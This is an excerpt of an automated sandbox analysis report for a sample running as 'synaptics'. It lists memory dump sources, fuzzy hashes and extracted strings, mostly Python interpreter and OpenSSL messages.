                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: acd25bf895a125f2791fcfa79732ea7dbb479c3bb7846010e63262df736c94c5
                                                                                                                                                                                                                                    • Instruction ID: 3b123518222030a46a9a583c70559cc7f4472a0bd1680f72c1d93fe3f5a38341
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acd25bf895a125f2791fcfa79732ea7dbb479c3bb7846010e63262df736c94c5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F128B1A092414BE704CE69DC40556B7F5EF81328B084769F8B9CBB81E735DD8BC7A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 057773f378b9b73618120adbe14206202d26c0f1e138a3b6af0e6e8aa0beee9b
                                                                                                                                                                                                                                    • Instruction ID: 2b73d2d4b4976244d0fa7c4d10f6a340d2ec0388632f8533e11fe9b0309cf97a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 057773f378b9b73618120adbe14206202d26c0f1e138a3b6af0e6e8aa0beee9b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EF12B7160A3419FC724CF29C850A5AB7F8BF8531CF144A6DF859A7B51E730D84ACBA2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7a383ad0fae5d09cf3b19fb36af917bd5fdaf30f92e1a146454b59425e11e7c0
                                                                                                                                                                                                                                    • Instruction ID: a5e814553eddb108520d0f48d05ace795d1a599b7d925ee697dd84b262c8874e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a383ad0fae5d09cf3b19fb36af917bd5fdaf30f92e1a146454b59425e11e7c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E1853150D7958FD315CF2D849001AFFE1AEDA241B488A9EF8E4DB783D635D609CBA2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 04896c0a0540063eb5f3d8cd896dd75a3df9e9be29785f8d5a57fe57457adb9c
                                                                                                                                                                                                                                    • Instruction ID: 317460612a9b94a7723ecae4774cbe116a214fbbb3feee8eaf95a705f365a793
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04896c0a0540063eb5f3d8cd896dd75a3df9e9be29785f8d5a57fe57457adb9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CD13D31A042998FDB14CF19C9957E5B7F1AB0A304F0802DDE9A997B42D734ADC6CBE1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cfb4f6ab3ea44d76dd0cac19393c7b8fdf30b3714df6e6b419cb9ea5553deb32
                                                                                                                                                                                                                                    • Instruction ID: ef4fffbe08f25e0029ba7252a1993ac03b16a431f0815797f4c552c885ebf6de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfb4f6ab3ea44d76dd0cac19393c7b8fdf30b3714df6e6b419cb9ea5553deb32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE10972A015288BCB68CF59DC957E9B3B2BF88308F1980EDD80ED7351DA359E958F44
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dca72a6078ef3edc4a30ee9cc0fa4ecbf291fcda4cab483c5f3b87fade495545
                                                                                                                                                                                                                                    • Instruction ID: d165aa0554f7c02b51c140460b5e306272f89e5ce0f7befb5cfcdf1e352d96e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dca72a6078ef3edc4a30ee9cc0fa4ecbf291fcda4cab483c5f3b87fade495545
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00D129B1A006188FCB11DFB9DC40BAA77B8EF49318F004669EA5DD7641FB30D999CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1fd03527065e5f3a20fcd679dafdb570914adb5967cd5ed030532b8cbaac201a
                                                                                                                                                                                                                                    • Instruction ID: f6710376608384e03978b24115efd46db4696c364fa8d7ac2bc5e3fd00445276
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fd03527065e5f3a20fcd679dafdb570914adb5967cd5ed030532b8cbaac201a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCC1C475E0422A8BCB04CFA9C89059EB7B1FF48324B19926BD91CDB745E730DD86CB90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: de5dc805363c12a2acd940a3ae69650960f5d41526e46945eb9206c188a15858
                                                                                                                                                                                                                                    • Instruction ID: d9c6711c6cb1416f277652419c62b08b9b8fdc0e4939ad40013dbfe36904cdd6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de5dc805363c12a2acd940a3ae69650960f5d41526e46945eb9206c188a15858
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FE17635108A66DFC715CF19C0808A1BBE1BF99305B9AC19EE5848B387C339F56ADB61
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a5d4bd528b04719339fb4637eb478ff26055e26ec3ce7c278a6b4f045ea9bdc1
                                                                                                                                                                                                                                    • Instruction ID: eb8d0b2d5897e99e8a5884046e71d69d88664393077418fbea4e715b153c321f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5d4bd528b04719339fb4637eb478ff26055e26ec3ce7c278a6b4f045ea9bdc1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B15E72A083554FC754DFADC88030AFBE1ABC8304F198A3DF9A8D7351E679D9098B95
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 427bc515e15f33f97024a6aee42b5ed18e6f533668e978d8b394a21db440bda2
                                                                                                                                                                                                                                    • Instruction ID: 01f7a3cb1eb68b967e01e6d9e5f4126f4baa20502f8673cd4917f6b83961bbd8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 427bc515e15f33f97024a6aee42b5ed18e6f533668e978d8b394a21db440bda2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2B17D21D18F89CACB03DF79C45116BB7B9BFAB285F01970AF8893A511EF30D0D98656
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA42000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA42000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca42000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b3cdef71625000cca250094634decbc921c1920e4e11774f010e3b9040ae557e
                                                                                                                                                                                                                                    • Instruction ID: bb8b3979a8dcd64c515a0af577d6c79218c70eb68bdd47fb5bc06dc1a402c380
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3cdef71625000cca250094634decbc921c1920e4e11774f010e3b9040ae557e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA810C61A042D99BD711CF68CC40BADF7B4EF55208F14C2AAE94CDB642E731EA89C790
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a98031ed714678d8e33534809ab7d70bf85eb552ea0d2d015a21f0d2344be729
                                                                                                                                                                                                                                    • Instruction ID: a8a09d2d2f53c5b12874657b21d07144091a39c098279d2d96bd3e336573afaf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a98031ed714678d8e33534809ab7d70bf85eb552ea0d2d015a21f0d2344be729
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 805140315093D18FD71ACF2D859046AFFE0AA96601F4886EEF8D5DB347C524DA09CBB2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C859000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C859000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c859000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e2123b6e89625349dbee858a4f720c999e2bcaa637c294e5dff26af657f5270c
                                                                                                                                                                                                                                    • Instruction ID: 0900e249ae786e94d6ef28b8d2d4e176c5766e048f4e348a31b3bd6b95d15a9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2123b6e89625349dbee858a4f720c999e2bcaa637c294e5dff26af657f5270c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D651C0B1A112168BEF65CF66D681BAEB7F0FB49358F20847AC420EB740D3B19951CF90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b452f374bfad6ee5d9662790a9ee3c4374919311df77863c2e7aeb7f9b33a4ed
                                                                                                                                                                                                                                    • Instruction ID: 8869b60faba118ff5b86afc51d62efb8692dc121df0216abb91a30ca631d9162
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b452f374bfad6ee5d9662790a9ee3c4374919311df77863c2e7aeb7f9b33a4ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC512F7120D3C58FD305CB6D848045EFFE0AEAA104F484AAEF8D4D7343C665DA0ACBA6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 94f4cc9ca06dc536baea0f4b9da83b90d65f89ab9f5df78b945a6d0bcf313e06
                                                                                                                                                                                                                                    • Instruction ID: 422f43fdc600bb521fb66cf8e749e12a184e79c3981b2f9afde9b54dfbc9ad02
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f4cc9ca06dc536baea0f4b9da83b90d65f89ab9f5df78b945a6d0bcf313e06
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26412D316593458FC304CF6DC88055AFBE1EF99218F4DC6ADE4889B303D276E90ACB96
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0bcdede71128444ae8973a8f2fff45846f02ae1f7f40563da7019319e1ab5681
                                                                                                                                                                                                                                    • Instruction ID: 62c3db3eaae7acf43536a260d614434333ed24fd80bdacc2a68955217b825ec0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bcdede71128444ae8973a8f2fff45846f02ae1f7f40563da7019319e1ab5681
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F4165612093C29FC70A8E6D48D05A6FF64AF67100B4C86DEE885DF747C114D6A9C7F5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA42000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA42000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca42000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0346f43613b429a03947dd3c044a93eabb8f0243d94c2111628753f19f3a7450
                                                                                                                                                                                                                                    • Instruction ID: fa30abb09d756c306554b96e014c7b81f4414c9a4bc4ff03ea32f0c7c64b07df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0346f43613b429a03947dd3c044a93eabb8f0243d94c2111628753f19f3a7450
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9411B971B101059FDB5CCE68C99295AB7A6EBC9314B68C7ADE819CB3D5C630DD82C7C0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: != $ < $ <= $ == $ > $ >= $ in $ is $ is not $ not in $unexpected comparison kind
                                                                                                                                                                                                                                    • API String ID: 0-1511525441
                                                                                                                                                                                                                                    • Opcode ID: 28f2d3d0696466e314b41696fd793f89dae33a13c183092868fd81a26451c158
                                                                                                                                                                                                                                    • Instruction ID: a1bb55fd1b9c8b9e656a8364bfdec417faef5e8d8cf3710fe2b4df28e2a1f268
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28f2d3d0696466e314b41696fd793f89dae33a13c183092868fd81a26451c158
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25410B71B442129BC6108F9DE845A2573A4BB4D338F244727F6398BBC2E730DC9997C2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA96000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA96000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca96000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: 0$9$A$Z$_$a$asyn$asyn$awai$z
                                                                                                                                                                                                                                    • API String ID: 0-1139154950
                                                                                                                                                                                                                                    • Opcode ID: 00d6c31f1b49802123a3ec1282fced623627980b1a0e80ebd7987d28c0e8a864
                                                                                                                                                                                                                                    • Instruction ID: 558ec36671683fd7711482487bc692aa1c32ac50dec1336b306e67722dd2b37c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00d6c31f1b49802123a3ec1282fced623627980b1a0e80ebd7987d28c0e8a864
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61511330A193408BDB508B25D59675A7BE4AF8631CF18896DD84DCBB41DB36C8CACBC3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • $, xrefs: 6CA8A134
                                                                                                                                                                                                                                    • first maketrans argument must be a string if there is a second argument, xrefs: 6CA8A0FA
                                                                                                                                                                                                                                    • string keys in translate table must be of length 1, xrefs: 6CA8A46A
                                                                                                                                                                                                                                    • keys in translate table must be strings or integers, xrefs: 6CA8A476
                                                                                                                                                                                                                                    • if you give only one argument to maketrans it must be a dict, xrefs: 6CA8A355
                                                                                                                                                                                                                                    • the first two maketrans arguments must have equal length, xrefs: 6CA8A117
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA83000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA83000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca83000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $$first maketrans argument must be a string if there is a second argument$if you give only one argument to maketrans it must be a dict$keys in translate table must be strings or integers$string keys in translate table must be of length 1$the first two maketrans arguments must have equal length
                                                                                                                                                                                                                                    • API String ID: 0-2387404945
                                                                                                                                                                                                                                    • Opcode ID: 708a0a22bc9eab31e74d575b211ee77195c06bad12ca27010759b7df1b8618fd
                                                                                                                                                                                                                                    • Instruction ID: e35c8d40a3edc5e98fc9b900af6d6794c2ea37e85c6a09f3ae911fee04b997aa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 708a0a22bc9eab31e74d575b211ee77195c06bad12ca27010759b7df1b8618fd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21C1D67260A2008FD700CF59C941B57B7F6EB85328F18462DE9998B7D1E735EC86CB91
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Exponent:$Modulus:$RSA$RSA-PSS$modulus:$publicExponent:
                                                                                                                                                                                                                                    • API String ID: 0-1253634278
                                                                                                                                                                                                                                    • Opcode ID: 26a68cdad974a1e22797a021c0650f479e72799e76f6c02c55f1381f6e382eec
                                                                                                                                                                                                                                    • Instruction ID: d21b86b17836239dc822b91a11606f16a60f59803edc5a3268b8dced89bfd510
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26a68cdad974a1e22797a021c0650f479e72799e76f6c02c55f1381f6e382eec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 267129716052056FE7119E25CE80F9B76DCAF5A348F4408B0FD24A7B81E731DA0AC7AB
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2193732148.0000000073A71000.00000020.00000001.01000000.00000012.sdmp, Offset: 73A71000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_73a71000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: dllmain_raw$Main@12
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2964726511-0
                                                                                                                                                                                                                                    • Opcode ID: 586ff07e5274e660dd75bc273654363bfecc9543af846442cdbfc9003fb3b0df
                                                                                                                                                                                                                                    • Instruction ID: e4240b17bce79a563f6211257c2707073f532b75a4030266a2b53c2a129477c3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 586ff07e5274e660dd75bc273654363bfecc9543af846442cdbfc9003fb3b0df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21A672E00254AFEB624F55C9C2BAF3AF9EB85694F05412BF81667668D3308D418BE0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                                                                                    • API String ID: 0-1666712896
                                                                                                                                                                                                                                    • Opcode ID: 7a8d0cd39c949b48881fe2d93dd0257e430a0f8076cd860302cf05fad0eb46f7
                                                                                                                                                                                                                                    • Instruction ID: 619b39dc34512ecd79b66f2f7b24f392a261cdab4564160bbd7c7f2cf3e616f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a8d0cd39c949b48881fe2d93dd0257e430a0f8076cd860302cf05fad0eb46f7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4516B31605615ABCB208F259C40BAEF7B9EF4D358F1446B9ED54ABB82C731A809C7E4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: RSA$RSA-PSS$modulus:$publicExponent:
                                                                                                                                                                                                                                    • API String ID: 0-340731038
                                                                                                                                                                                                                                    • Opcode ID: a1325eac83d52ec00490fab4e92f08013ce95fa61a92ff4bb039ad59e114ee7d
                                                                                                                                                                                                                                    • Instruction ID: e467bc203cd55976725ac141ae6345eaa9e2033964a4b2c356baf144d4e84bc3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1325eac83d52ec00490fab4e92f08013ce95fa61a92ff4bb039ad59e114ee7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56612AB16052056FE7019E25CE80FAB76DCAF49348F4008B4FD24A7B81E771DA06C7AB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                                                                                    • API String ID: 0-4063833818
                                                                                                                                                                                                                                    • Opcode ID: 182fed269ef7012eaf8aefdffa91c7ab58abe9f20767b1a61e21b9131910ee08
                                                                                                                                                                                                                                    • Instruction ID: 4d8c62132d5c29faeeeedacbba5e601bb92753cad0a86a59c42dec93a2825128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 182fed269ef7012eaf8aefdffa91c7ab58abe9f20767b1a61e21b9131910ee08
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 803148326057147BDB315A258D40FAEB7AC9F49758F200A75F914ABBC2C671EC0587E4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • field 'args' is required for FunctionDef, xrefs: 6CA9A1AA
                                                                                                                                                                                                                                    • field 'args' is required for AsyncFunctionDef, xrefs: 6CA9A177
                                                                                                                                                                                                                                    • field 'name' is required for FunctionDef, xrefs: 6CA9A19C
                                                                                                                                                                                                                                    • field 'name' is required for AsyncFunctionDef, xrefs: 6CA9A124
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA9A000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA9A000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
